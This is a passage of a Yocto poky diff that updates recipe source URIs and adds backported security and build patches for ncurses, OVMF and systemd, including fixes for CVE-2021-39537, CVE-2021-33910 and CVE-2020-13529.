+SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \
file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \
file://99_network \
file://0001-Define-FNM_EXTMATCH-for-musl.patch \
diff --git a/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index fe1715f2e3a..455fe825c82 100644
--- a/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -24,7 +24,7 @@ IMAGE_FSTYPES = "wic.vmdk wic.vhd wic.vhdx"
inherit core-image setuptools3
-SRCREV ?= "96e8fcd6a24fd732e010607be347cbb3348ef725"
+SRCREV ?= "ec3ac9d883d53ebbf3c6b9a80694df69c9e9ccc7"
SRC_URI = "git://git.yoctoproject.org/poky;branch=hardknott \
file://Yocto_Build_Appliance.vmx \
file://Yocto_Build_Appliance.vmxf \
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
index 4c79f412857..7e92f93322b 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
@@ -1,4 +1,4 @@
-#/bin/sh
+#!/bin/sh
# Copyright (C) 2011 O.S. Systems Software LTDA.
# Licensed on MIT
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework_1.0.bb b/meta/recipes-core/initrdscripts/initramfs-framework_1.0.bb
index c53a0c03ae6..fe24215b465 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework_1.0.bb
+++ b/meta/recipes-core/initrdscripts/initramfs-framework_1.0.bb
@@ -31,7 +31,7 @@ do_install() {
install -m 0755 ${WORKDIR}/rootfs ${D}/init.d/90-rootfs
install -m 0755 ${WORKDIR}/finish ${D}/init.d/99-finish
- # exec
+ # exec
install -m 0755 ${WORKDIR}/exec ${D}/init.d/89-exec
# mdev
diff --git a/meta/recipes-core/initscripts/init-system-helpers_1.60.bb b/meta/recipes-core/initscripts/init-system-helpers_1.60.bb
index 33977e66c10..98f45e1355c 100644
--- a/meta/recipes-core/initscripts/init-system-helpers_1.60.bb
+++ b/meta/recipes-core/initscripts/init-system-helpers_1.60.bb
@@ -17,7 +17,7 @@ LICENSE = "BSD-3-Clause & GPLv2"
LIC_FILES_CHKSUM = "file://debian/copyright;md5=ee2b1830fcfead84d07bc060ec43e072"
SRCREV = "dbd9197569c0935029acd5c9b02b84c68fd937ee"
-SRC_URI = "git://salsa.debian.org/debian/init-system-helpers.git;protocol=https"
+SRC_URI = "git://salsa.debian.org/debian/init-system-helpers.git;protocol=https;branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/initscripts/initscripts_1.0.bb b/meta/recipes-core/initscripts/initscripts_1.0.bb
index 5e994f2b7fd..65f9c0ae8d3 100644
--- a/meta/recipes-core/initscripts/initscripts_1.0.bb
+++ b/meta/recipes-core/initscripts/initscripts_1.0.bb
@@ -106,7 +106,8 @@ do_install () {
install -m 0755 ${WORKDIR}/save-rtc.sh ${D}${sysconfdir}/init.d
install -m 0644 ${WORKDIR}/volatiles ${D}${sysconfdir}/default/volatiles/00_core
if [ ${@ oe.types.boolean('${VOLATILE_LOG_DIR}') } = True ]; then
- echo "l root root 0755 /var/log /var/volatile/log" >> ${D}${sysconfdir}/default/volatiles/00_core
+ sed -i -e '\@^d root root 0755 /var/volatile/log none$@ a\l root root 0755 /var/log /var/volatile/log' \
+ ${D}${sysconfdir}/default/volatiles/00_core
fi
install -m 0755 ${WORKDIR}/dmesg.sh ${D}${sysconfdir}/init.d
install -m 0644 ${WORKDIR}/logrotate-dmesg.conf ${D}${sysconfdir}/
diff --git a/meta/recipes-core/libxcrypt/libxcrypt.inc b/meta/recipes-core/libxcrypt/libxcrypt.inc
index b5ca863d54b..8008ba2d384 100644
--- a/meta/recipes-core/libxcrypt/libxcrypt.inc
+++ b/meta/recipes-core/libxcrypt/libxcrypt.inc
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://LICENSING;md5=bd5d9777dfe7076c4f2928f12fed226a \
inherit autotools pkgconfig
-SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH} \
+SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https \
file://0001-configure.ac-do-not-use-compute-symver-floor.patch \
"
SRCREV = "94d84f92ca123d851586016c4678eb1f21c19029"
diff --git a/meta/recipes-core/libxml/libxml2_2.9.10.bb b/meta/recipes-core/libxml/libxml2_2.9.10.bb
index ce4f9a33408..cabf9118169 100644
--- a/meta/recipes-core/libxml/libxml2_2.9.10.bb
+++ b/meta/recipes-core/libxml/libxml2_2.9.10.bb
@@ -47,7 +47,7 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
inherit autotools pkgconfig binconfig-disabled ptest
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)}
RDEPENDS_${PN}-ptest += "make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
diff --git a/meta/recipes-core/musl/libucontext_git.bb b/meta/recipes-core/musl/libucontext_git.bb
index 11affebb499..87946b7ec3c 100644
--- a/meta/recipes-core/musl/libucontext_git.bb
+++ b/meta/recipes-core/musl/libucontext_git.bb
@@ -10,7 +10,7 @@ DEPENDS = ""
PV = "0.10+${SRCPV}"
SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561"
-SRC_URI = "git://github.com/kaniini/libucontext \
+SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/musl/musl-obstack.bb b/meta/recipes-core/musl/musl-obstack.bb
index 3003935fe5a..74de48c2cd7 100644
--- a/meta/recipes-core/musl/musl-obstack.bb
+++ b/meta/recipes-core/musl/musl-obstack.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
PV = "1.1"
SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4"
-SRC_URI = "git://github.com/pullmoll/musl-obstack"
+SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl-utils.bb b/meta/recipes-core/musl/musl-utils.bb
index dd0ce330613..c30509469ca 100644
--- a/meta/recipes-core/musl/musl-utils.bb
+++ b/meta/recipes-core/musl/musl-utils.bb
@@ -11,7 +11,7 @@ SECTION = "utils"
PV = "20170421"
SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d"
-SRC_URI = "git://github.com/boltlinux/musl-utils"
+SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl_git.bb b/meta/recipes-core/musl/musl_git.bb
index e6f9e2441e4..a241a2fbbdd 100644
--- a/meta/recipes-core/musl/musl_git.bb
+++ b/meta/recipes-core/musl/musl_git.bb
@@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}"
# mirror is at git://github.com/kraj/musl.git
-SRC_URI = "git://git.musl-libc.org/musl \
+SRC_URI = "git://git.musl-libc.org/musl;branch=master \
file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \
file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \
"
diff --git a/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
new file mode 100644
index 00000000000..d63bf57e8d2
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
@@ -0,0 +1,65 @@
+From e83ecbd26252bac163fc4377ef30edbd4acb0bad Mon Sep 17 00:00:00 2001
+From: Sven Joachim <svenjoac@gmx.de>
+Date: Mon, 1 Jun 2020 08:03:52 +0200
+Subject: [PATCH] Import upstream patch 20200531
+
+20200531
+ + correct configure version-check/warnng for g++ to allow for 10.x
+ + re-enable "bel" in konsole-base (report by Nia Huang)
+ + add linux-s entry (patch by Alexandre Montaron).
+ + drop long-obsolete convert_configure.pl
+ + add test/test_parm.c, for checking tparm changes.
+ + improve parameter-checking for tparm, adding function _nc_tiparm() to
+ handle the most-used case, which accepts only numeric parameters
+ (report/testcase by "puppet-meteor").
+ + use a more conservative estimate of the buffer-size in lib_tparm.c's
+ save_text() and save_number(), in case the sprintf() function
+ passes-through unexpected characters from a format specifier
+ (report/testcase by "puppet-meteor").
+ + add a check for end-of-string in cvtchar to handle a malformed
+ string in infotocap (report/testcase by "puppet-meteor").
+
+CVE: CVE-2021-39537
+
+Upstream-Status: Backport [https://github.com/mirror/ncurses/commit/790a85dbd4a81d5f5d8dd02a44d84f01512ef443]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ ncurses/tinfo/captoinfo.c | 11 +-
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/ncurses/tinfo/captoinfo.c b/ncurses/tinfo/captoinfo.c
+index 8b3b83d1..9362105a 100644
+--- a/ncurses/tinfo/captoinfo.c
++++ b/ncurses/tinfo/captoinfo.c
+@@ -98,7 +98,7 @@
+ #include <ctype.h>
+ #include <tic.h>
+
+-MODULE_ID("$Id: captoinfo.c,v 1.98 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: captoinfo.c,v 1.99 2020/05/25 21:28:29 tom Exp $")
+
+ #if 0
+ #define DEBUG_THIS(p) DEBUG(9, p)
+@@ -216,12 +216,15 @@ cvtchar(register const char *sp)
+ }
+ break;
+ case '^':
++ len = 2;
+ c = UChar(*++sp);
+- if (c == '?')
++ if (c == '?') {
+ c = 127;
+- else
++ } else if (c == '\0') {
++ len = 1;
++ } else {
+ c &= 0x1f;
+- len = 2;
++ }
+ break;
+ default:
+ c = UChar(*sp);
+--
+2.17.1
+
diff --git a/meta/recipes-core/ncurses/ncurses.inc b/meta/recipes-core/ncurses/ncurses.inc
index ef59bc3b0a0..9c74d2ec36e 100644
--- a/meta/recipes-core/ncurses/ncurses.inc
+++ b/meta/recipes-core/ncurses/ncurses.inc
@@ -13,7 +13,7 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \
inherit autotools binconfig-disabled multilib_header pkgconfig
# Upstream has useful patches at times at ftp://invisible-island.net/ncurses/
-SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https"
+SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master"
EXTRA_AUTORECONF = "-I m4"
diff --git a/meta/recipes-core/ncurses/ncurses_6.2.bb b/meta/recipes-core/ncurses/ncurses_6.2.bb
index e7d7396a205..598c51b00b7 100644
--- a/meta/recipes-core/ncurses/ncurses_6.2.bb
+++ b/meta/recipes-core/ncurses/ncurses_6.2.bb
@@ -3,6 +3,7 @@ require ncurses.inc
SRC_URI += "file://0001-tic-hang.patch \
file://0002-configure-reproducible.patch \
file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \
+ file://CVE-2021-39537.patch \
"
# commit id corresponds to the revision in package version
SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4"
diff --git a/meta/recipes-core/netbase/netbase_6.2.bb b/meta/recipes-core/netbase/netbase_6.2.bb
index a54d2e77645..ad7e9becde9 100644
--- a/meta/recipes-core/netbase/netbase_6.2.bb
+++ b/meta/recipes-core/netbase/netbase_6.2.bb
@@ -6,11 +6,12 @@ LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://debian/copyright;md5=3dd6192d306f582dee7687da3d8748ab"
PE = "1"
-SRC_URI = "${DEBIAN_MIRROR}/main/n/${BPN}/${BPN}_${PV}.tar.xz"
+SRC_URI = "git://salsa.debian.org/md/netbase.git;protocol=https;branch=master"
+SRCREV = "1c892c96a078ef28ec1a94681b3a0da7a3d545f7"
inherit allarch
-SRC_URI[sha256sum] = "309a24146a06347d654b261e9e07a82fab844b173674a42e223803dd8258541e"
+S = "${WORKDIR}/git"
UPSTREAM_CHECK_URI = "${DEBIAN_MIRROR}/main/n/netbase/"
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
new file mode 100644
index 00000000000..d658123b816
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
@@ -0,0 +1,51 @@
+From 498627ebda6271b59920f43a0b9b6187edeb7b09 Mon Sep 17 00:00:00 2001
+From: Adrian Herrera <adr.her.arc.95@gmail.com>
+Date: Mon, 22 Mar 2021 21:06:47 +0000
+Subject: [PATCH] Fix VLA parameter warning
+
+Make VLA buffer types consistent in declarations and definitions.
+Resolves build crash when using -Werror due to "vla-parameter" warning.
+
+Upstream-Status: Submitted [https://github.com/google/brotli/pull/893]
+Signed-off-by: Adrian Herrera <adr.her.arc.95@gmail.com>
+---
+ c/dec/decode.c | 6 ++++--
+ c/enc/encode.c | 5 +++--
+ 2 files changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+index 114c505..bb6f1ab 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
++++ b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+@@ -2030,8 +2030,10 @@ static BROTLI_NOINLINE BrotliDecoderErrorCode SafeProcessCommands(
+ }
+
+ BrotliDecoderResult BrotliDecoderDecompress(
+- size_t encoded_size, const uint8_t* encoded_buffer, size_t* decoded_size,
+- uint8_t* decoded_buffer) {
++ size_t encoded_size,
++ const uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(encoded_size)],
++ size_t* decoded_size,
++ uint8_t decoded_buffer[BROTLI_ARRAY_PARAM(*decoded_size)]) {
+ BrotliDecoderState s;
+ BrotliDecoderResult result;
+ size_t total_out = 0;
+diff --git a/c/enc/encode.c b/c/enc/encode.c
+index 68548ef..ab0a490 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
++++ c/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
+@@ -1470,8 +1470,9 @@ static size_t MakeUncompressedStream(
+
+ BROTLI_BOOL BrotliEncoderCompress(
+ int quality, int lgwin, BrotliEncoderMode mode, size_t input_size,
+- const uint8_t* input_buffer, size_t* encoded_size,
+- uint8_t* encoded_buffer) {
++ const uint8_t input_buffer[BROTLI_ARRAY_PARAM(input_size)],
++ size_t* encoded_size,
++ uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(*encoded_size)]) {
+ BrotliEncoderState* s;
+ size_t out_size = *encoded_size;
+ const uint8_t* input_start = input_buffer;
+--
+2.31.1
+
diff --git a/meta/recipes-core/ovmf/ovmf_git.bb b/meta/recipes-core/ovmf/ovmf_git.bb
index 896b3b63202..9a1bfbd69c5 100644
--- a/meta/recipes-core/ovmf/ovmf_git.bb
+++ b/meta/recipes-core/ovmf/ovmf_git.bb
@@ -17,6 +17,7 @@ SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=https \
file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \
file://0004-ovmf-Update-to-latest.patch \
file://zero.patch \
+ file://0001-Fix-VLA-parameter-warning.patch \
"
PV = "edk2-stable202102"
diff --git a/meta/recipes-core/psplash/psplash_git.bb b/meta/recipes-core/psplash/psplash_git.bb
index 59e1e3f194e..e1236475fc7 100644
--- a/meta/recipes-core/psplash/psplash_git.bb
+++ b/meta/recipes-core/psplash/psplash_git.bb
@@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962"
PV = "0.1+git${SRCPV}"
PR = "r15"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://psplash-init \
file://psplash-start.service \
file://psplash-systemd.service \
diff --git a/meta/recipes-core/systemd/systemd.inc b/meta/recipes-core/systemd/systemd.inc
index 7d3b3064ba9..b11ab112afe 100644
--- a/meta/recipes-core/systemd/systemd.inc
+++ b/meta/recipes-core/systemd/systemd.inc
@@ -16,6 +16,6 @@ LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
SRCREV = "17472dca0160cbe7b807ca648475fd70d0d62fe5"
SRCBRANCH = "v247-stable"
-SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/systemd/systemd/0001-basic-unit-name-do-not-use-strdupa-on-a-path.patch b/meta/recipes-core/systemd/systemd/0001-basic-unit-name-do-not-use-strdupa-on-a-path.patch
new file mode 100644
index 00000000000..0ab81744418
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/0001-basic-unit-name-do-not-use-strdupa-on-a-path.patch
@@ -0,0 +1,72 @@
+From b00674347337b7531c92fdb65590ab253bb57538 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 23 Jun 2021 11:46:41 +0200
+Subject: [PATCH] basic/unit-name: do not use strdupa() on a path
+
+The path may have unbounded length, for example through a fuse mount.
+
+CVE-2021-33910: attacked controlled alloca() leads to crash in systemd and
+ultimately a kernel panic. Systemd parses the content of /proc/self/mountinfo
+and each mountpoint is passed to mount_setup_unit(), which calls
+unit_name_path_escape() underneath. A local attacker who is able to mount a
+filesystem with a very long path can crash systemd and the whole system.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1970887
+
+The resulting string length is bounded by UNIT_NAME_MAX, which is 256. But we
+can't easily check the length after simplification before doing the
+simplification, which in turns uses a copy of the string we can write to.
+So we can't reject paths that are too long before doing the duplication.
+Hence the most obvious solution is to switch back to strdup(), as before
+7410616cd9dbbec97cf98d75324da5cda2b2f7a2.
+
+(cherry picked from commit 441e0115646d54f080e5c3bb0ba477c892861ab9)
+(cherry picked from commit 764b74113e36ac5219a4b82a05f311b5a92136ce)
+(cherry picked from commit 4a1c5f34bd3e1daed4490e9d97918e504d19733b)
+
+CVE: CVE-2021-33910
+Upstream-Status: Backport [b00674347337b7531c92fdb65590ab253bb57538]
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+---
+ src/basic/unit-name.c | 13 +++++--------
+ 1 file changed, 5 insertions(+), 8 deletions(-)
+
+diff --git a/src/basic/unit-name.c b/src/basic/unit-name.c
+index 5f595af944..9b6cacde87 100644
+--- a/src/basic/unit-name.c
++++ b/src/basic/unit-name.c
+@@ -378,12 +378,13 @@ int unit_name_unescape(const char *f, char **ret) {
+ }
+
+ int unit_name_path_escape(const char *f, char **ret) {
+- char *p, *s;
++ _cleanup_free_ char *p = NULL;
++ char *s;
+
+ assert(f);
+ assert(ret);
+
+- p = strdupa(f);
++ p = strdup(f);
+ if (!p)
+ return -ENOMEM;
+
+@@ -395,13 +396,9 @@ int unit_name_path_escape(const char *f, char **ret) {
+ if (!path_is_normalized(p))
+ return -EINVAL;
+
+- /* Truncate trailing slashes */
++ /* Truncate trailing slashes and skip leading slashes */
+ delete_trailing_chars(p, "/");
+-
+- /* Truncate leading slashes */
+- p = skip_leading_chars(p, "/");
+-
+- s = unit_name_escape(p);
++ s = unit_name_escape(skip_leading_chars(p, "/"));
+ }
+ if (!s)
+ return -ENOMEM;
+--
+2.33.0
+
diff --git a/meta/recipes-core/systemd/systemd/0001-sd-dhcp-client-check-error-earlier-and-reduce-indent.patch b/meta/recipes-core/systemd/systemd/0001-sd-dhcp-client-check-error-earlier-and-reduce-indent.patch
new file mode 100644
index 00000000000..ff877d91752
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/0001-sd-dhcp-client-check-error-earlier-and-reduce-indent.patch
@@ -0,0 +1,172 @@
+From ac6c7f2d2389c5c0ae90554a58f1c75f60cc8e5a Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 00:48:23 +0900
+Subject: [PATCH] sd-dhcp-client: check error earlier and reduce indentation
+
+Upstream-Status: Backport
+CVE: CVE-2020-13529
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+---
+ src/libsystemd-network/sd-dhcp-client.c | 128 ++++++++++++------------
+ 1 file changed, 64 insertions(+), 64 deletions(-)
+
+diff --git a/src/libsystemd-network/sd-dhcp-client.c b/src/libsystemd-network/sd-dhcp-client.c
+index d472fcd941..86bc3c6181 100644
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1770,21 +1770,21 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+ case DHCP_STATE_SELECTING:
+
+ r = client_handle_offer(client, message, len);
+- if (r >= 0) {
++ if (r == -ENOMSG)
++ return 0; /* invalid message, let's ignore it */
++ if (r < 0)
++ goto error;
+
+- client->state = DHCP_STATE_REQUESTING;
+- client->attempt = 0;
++ client->state = DHCP_STATE_REQUESTING;
++ client->attempt = 0;
+
+- r = event_reset_time(client->event, &client->timeout_resend,
+- clock_boottime_or_monotonic(),
+- 0, 0,
+- client_timeout_resend, client,
+- client->event_priority, "dhcp4-resend-timer", true);
+- if (r < 0)
+- goto error;
+- } else if (r == -ENOMSG)
+- /* invalid message, let's ignore it */
+- return 0;
++ r = event_reset_time(client->event, &client->timeout_resend,
++ clock_boottime_or_monotonic(),
++ 0, 0,
++ client_timeout_resend, client,
++ client->event_priority, "dhcp4-resend-timer", true);
++ if (r < 0)
++ goto error;
+
+ break;
+
+@@ -1794,47 +1794,9 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+ case DHCP_STATE_REBINDING:
+
+ r = client_handle_ack(client, message, len);
+- if (r >= 0) {
+- client->start_delay = 0;
+- (void) event_source_disable(client->timeout_resend);
+- client->receive_message =
+- sd_event_source_unref(client->receive_message);
+- client->fd = safe_close(client->fd);
+-
+- if (IN_SET(client->state, DHCP_STATE_REQUESTING,
+- DHCP_STATE_REBOOTING))
+- notify_event = SD_DHCP_CLIENT_EVENT_IP_ACQUIRE;
+- else if (r != SD_DHCP_CLIENT_EVENT_IP_ACQUIRE)
+- notify_event = r;
+-
+- client->state = DHCP_STATE_BOUND;
+- client->attempt = 0;
+-
+- client->last_addr = client->lease->address;
+-
+- r = client_set_lease_timeouts(client);
+- if (r < 0) {
+- log_dhcp_client(client, "could not set lease timeouts");
+- goto error;
+- }
+-
+- r = dhcp_network_bind_udp_socket(client->ifindex, client->lease->address, client->port, client->ip_service_type);
+- if (r < 0) {
+- log_dhcp_client(client, "could not bind UDP socket");
+- goto error;
+- }
+-
+- client->fd = r;
+-
+- client_initialize_io_events(client, client_receive_message_udp);
+-
+- if (notify_event) {
+- client_notify(client, notify_event);
+- if (client->state == DHCP_STATE_STOPPED)
+- return 0;
+- }
+-
+- } else if (r == -EADDRNOTAVAIL) {
++ if (r == -ENOMSG)
++ return 0; /* invalid message, let's ignore it */
++ if (r == -EADDRNOTAVAIL) {
+ /* got a NAK, let's restart the client */
+ client_notify(client, SD_DHCP_CLIENT_EVENT_EXPIRED);
+
+@@ -1853,21 +1815,59 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+ RESTART_AFTER_NAK_MIN_USEC, RESTART_AFTER_NAK_MAX_USEC);
+
+ return 0;
+- } else if (r == -ENOMSG)
+- /* invalid message, let's ignore it */
+- return 0;
++ }
++ if (r < 0)
++ goto error;
++
++ client->start_delay = 0;
++ (void) event_source_disable(client->timeout_resend);
++ client->receive_message = sd_event_source_unref(client->receive_message);
++ client->fd = safe_close(client->fd);
++
++ if (IN_SET(client->state, DHCP_STATE_REQUESTING, DHCP_STATE_REBOOTING))
++ notify_event = SD_DHCP_CLIENT_EVENT_IP_ACQUIRE;
++ else if (r != SD_DHCP_CLIENT_EVENT_IP_ACQUIRE)
++ notify_event = r;
++
++ client->state = DHCP_STATE_BOUND;
++ client->attempt = 0;
++
++ client->last_addr = client->lease->address;
++
++ r = client_set_lease_timeouts(client);
++ if (r < 0) {
++ log_dhcp_client(client, "could not set lease timeouts");
++ goto error;
++ }
++
++ r = dhcp_network_bind_udp_socket(client->ifindex, client->lease->address, client->port, client->ip_service_type);
++ if (r < 0) {
++ log_dhcp_client(client, "could not bind UDP socket");
++ goto error;
++ }
++
++ client->fd = r;
++
++ client_initialize_io_events(client, client_receive_message_udp);
++
++ if (notify_event) {
++ client_notify(client, notify_event);
++ if (client->state == DHCP_STATE_STOPPED)
++ return 0;
++ }
+
+ break;
+
+ case DHCP_STATE_BOUND:
+ r = client_handle_forcerenew(client, message, len);
+- if (r >= 0) {
+- r = client_timeout_t1(NULL, 0, client);
+- if (r < 0)
+- goto error;
+- } else if (r == -ENOMSG)
+- /* invalid message, let's ignore it */
+- return 0;
++ if (r == -ENOMSG)
++ return 0; /* invalid message, let's ignore it */
++ if (r < 0)
++ goto error;
++
++ r = client_timeout_t1(NULL, 0, client);
++ if (r < 0)
++ goto error;
+
+ break;
+
diff --git a/meta/recipes-core/systemd/systemd/0002-sd-dhcp-client-shorten-code-a-bit.patch b/meta/recipes-core/systemd/systemd/0002-sd-dhcp-client-shorten-code-a-bit.patch
new file mode 100644
index 00000000000..41d0c7b1e47
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/0002-sd-dhcp-client-shorten-code-a-bit.patch
@@ -0,0 +1,66 @@
+From 875f3773e383d99e7d43020f02acad7681a05914 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 00:51:52 +0900
+Subject: [PATCH] sd-dhcp-client: shorten code a bit
+
+Upstream-Status: Backport
+CVE: CVE-2020-13529
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+---
+ src/libsystemd-network/sd-dhcp-client.c | 13 ++++---------
+ 1 file changed, 4 insertions(+), 9 deletions(-)
+
+diff --git a/src/libsystemd-network/sd-dhcp-client.c b/src/libsystemd-network/sd-dhcp-client.c
+index 86bc3c6181..ef3a7d2c6b 100644
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1760,7 +1760,7 @@ static int client_set_lease_timeouts(sd_dhcp_client *client) {
+ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, int len) {
+ DHCP_CLIENT_DONT_DESTROY(client);
+ char time_string[FORMAT_TIMESPAN_MAX];
+- int r = 0, notify_event = 0;
++ int r, notify_event = 0;
+
+ assert(client);
+ assert(client->event);
+@@ -1783,9 +1783,6 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+ 0, 0,
+ client_timeout_resend, client,
+ client->event_priority, "dhcp4-resend-timer", true);
+- if (r < 0)
+- goto error;
+-
+ break;
+
+ case DHCP_STATE_REBOOTING:
+@@ -1813,7 +1810,6 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+
+ client->start_delay = CLAMP(client->start_delay * 2,
+ RESTART_AFTER_NAK_MIN_USEC, RESTART_AFTER_NAK_MAX_USEC);
+-
+ return 0;
+ }
+ if (r < 0)
+@@ -1866,19 +1862,18 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+ goto error;
+
+ r = client_timeout_t1(NULL, 0, client);
+- if (r < 0)
+- goto error;
+-
+ break;
+
+ case DHCP_STATE_INIT:
+ case DHCP_STATE_INIT_REBOOT:
+-
++ r = 0;
+ break;
+
+ case DHCP_STATE_STOPPED:
+ r = -EINVAL;
+ goto error;
++ default:
++ assert_not_reached("invalid state");
+ }
+
+ error:
diff --git a/meta/recipes-core/systemd/systemd/0003-sd-dhcp-client-logs-when-dhcp-client-unexpectedly-ga.patch b/meta/recipes-core/systemd/systemd/0003-sd-dhcp-client-logs-when-dhcp-client-unexpectedly-ga.patch
new file mode 100644
index 00000000000..07c7da8c217
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/0003-sd-dhcp-client-logs-when-dhcp-client-unexpectedly-ga.patch
@@ -0,0 +1,69 @@
+From 0ad3b0fffe622bffbe9f380c3e4cb99b0961bef5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 01:14:12 +0900
+Subject: [PATCH] sd-dhcp-client: logs when dhcp client unexpectedly gains a
+ new lease
+
+Previously, such situation is handled silently.
+
+Upstream-Status: Backport
+CVE: CVE-2020-13529
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+---
+ src/libsystemd-network/sd-dhcp-client.c | 23 ++++++++++++-----------
+ 1 file changed, 12 insertions(+), 11 deletions(-)
+
+diff --git a/src/libsystemd-network/sd-dhcp-client.c b/src/libsystemd-network/sd-dhcp-client.c
+index ef3a7d2c6b..04a75c6966 100644
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1760,7 +1760,7 @@ static int client_set_lease_timeouts(sd_dhcp_client *client) {
+ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, int len) {
+ DHCP_CLIENT_DONT_DESTROY(client);
+ char time_string[FORMAT_TIMESPAN_MAX];
